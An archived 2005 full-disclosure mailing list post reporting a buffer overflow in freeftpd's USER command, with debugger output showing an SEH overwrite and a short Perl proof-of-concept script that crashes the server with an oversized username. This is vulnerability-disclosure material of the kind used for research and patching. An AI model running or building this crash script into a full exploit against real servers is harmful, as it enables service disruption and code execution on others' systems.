[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [Full-disclosure] freeftpd USER bufferoverflow
From: barabas mutsonline <barbsie () gmail ! com>
Date: 2005-11-16 9:56:54
Message-ID: 981281b10511160156x26da1beco2bdd1547b809abe5 () mail ! gmail ! com
[Download RAW message or body]
[Attachment #2 (multipart/alternative)]
Hi,
While drooling over my new Adriana Lima wallpaper, my tongue accidentally
hit my keyboard and more than 1012 chars were sent to the login screen of my
freeftpd server (which i use to backup my Adriana Lima pics). Guess
what...the server crashed! Luckily I attach ollydbg to every process I have
running and ths is what I found:
ECX 50505050
EIP 77C460CB msvcrt.77C460CB
Log data, item 0
Address=77C460CB
Message=Access violation when reading [50505050]
77C460CB 8B01 MOV EAX,DWORD PTR DS:[ECX]
well, eip doesnt get overwritten, but SEH does:
0012B6CC 41414141
0012B6D0 42424242
0012B6D4 42424242
0012B6D8 43434343 Pointer to next SEH record
0012B6DC 47464544 SE handler
EIP 47464544
Log data, item 0
Address=47464544
Message=Access violation when executing [47464544]
I leave the exploit coding as an exercise...
enjoy
sample crash code:
#!/usr/bin/perl -w
#freeftpd USER buffer overflow
#barabas - 2005
use strict;
use Net::FTP;
my $user="\x41"x1011;
$user .="\x44\x45\x46\x47";#overwrite SEH
$user .="\x50"x400;
my $ftp = Net::FTP->new("127.0.0.1 <http://127.0.0.1>", Debug => 1);
$ftp->login("$user","whatevah");
[Attachment #5 (text/html)]
<div>Hi,</div>
<div> </div>
<div>While drooling over my new Adriana Lima wallpaper, my tongue accidentally hit my \
keyboard and more than 1012 chars were sent to the login screen of my freeftpd server \
(which i use to backup my Adriana Lima pics). Guess what...the server crashed! \
Luckily I attach ollydbg to every process I have running and ths is what I found: \
</div> <div> </div>
<div>ECX 50505050<br> </div>
<div>EIP 77C460CB msvcrt.77C460CB<br>Log data, item \
0<br> Address=77C460CB<br> Message=Access violation when reading \
[50505050]<br> </div> <div>77C460CB \
8B01 MOV \
EAX,DWORD PTR DS:[ECX]</div> <div> </div>
<div>well, eip doesnt get overwritten, but SEH does:</div>
<div> </div>
<div>
<p>0012B6CC 41414141<br>0012B6D0 \
42424242<br>0012B6D4 42424242<br>0012B6D8 43434343 \
Pointer to next SEH record<br>0012B6DC 47464544 SE handler</p> \
<p>EIP 47464544</p> <p> Log data, item \
0<br> Address=47464544<br> Message=Access violation when executing \
[47464544]<br></p></div> <div> I leave the exploit coding as an \
exercise...</div> <div> </div>
<div>enjoy</div>
<div> </div>
<div>sample crash code:</div>
<div> </div>
<div>
<p>#!/usr/bin/perl -w<br>#freeftpd USER buffer overflow<br>#barabas - 2005</p>
<p>use strict;<br>use Net::FTP;<br>my $user="\x41"x1011;<br>$user \
.="\x44\x45\x46\x47";#overwrite SEH<br>$user .="\x50"x400;</p> \
<p>my $ftp = Net::FTP->new("<a href="http://127.0.0.1">127.0.0.1</a>", \
Debug => 1);<br>$ftp->login("$user","whatevah");</p> \
<p><br> </p></div>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic